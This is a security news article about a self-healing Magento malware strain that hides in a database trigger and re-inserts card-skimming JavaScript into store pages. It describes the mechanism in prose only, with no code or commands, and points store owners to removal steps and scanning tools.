Researchers Discover Self-Healing Malware That Targets Magento Stores

Share this…

Dutch malware experts have found a new malware strain that targets online shops running on the Magento platform, which can self-heal using code hidden in the website’s database.

While this is not the first web malware that hides code in the website’s database, this is the first one that’s written in SQL, as a stored procedure, in this case, a Mangeto database trigger operation.

Malware hidden in SQL stored procedure

Discovered by Jeroen Boersma and analyzed by Willem de Groot, this malware starts execution whenever a user places a new order.

When this happens, a malicious database trigger (a set of automated SQL operations, also known as a stored procedure) executes before Magento puts together the PHP code and assembles the page.

This database trigger checks if the malware’s malicious JavaScript code is present in the store’s header, footer, and copyright section. Additionally, it also checks various Magento CMS blocks where the malicious code could also reside.

If it doesn’t find any traces of its JavaScript code, the database trigger contains instructions that will re-insert it in the site’s source code, via a series of SQL operations.

First Magento malware that uses SQL stored procedures

This “self-healing” behavior, as de Groot describes, is a first for Magento malware.

“Malware was stored in [databases] before, but only as text,” de Groot said speaking to Bleeping Computer.

“You could scan a dump of your database and know whether it contains malicious stuff. But now, the actual malware is executed inside the DB,” de Groot said. “This is the first time I see malware written in SQL. Previously, malware was written in JS or PHP.”

Malware is harder to remove, will survive basic clean operations

Of course, this Magento malware also has its JS & PHP component that takes care of stealing user card information, but the SQL part is new. According to de Groot, the SQL part is there to ensure the malware survives as much as possible.

“The malware got resilient against removal attempts,” he said. “The malware [now] attacks the DB instead of the e-commerce app.”

According to de Groot, this particular malware strain appears to infect databases following brute-force attacks on the /rss/catalog/notifystock/ URL, even on completely patched shops.

The researcher lists removal steps for this malicious Magento database trigger on his site. Store owners can scan their shops via de Groot’s two tools, MageReport and the Magento Malware Scanner, which have received updates to detect this new class of malware.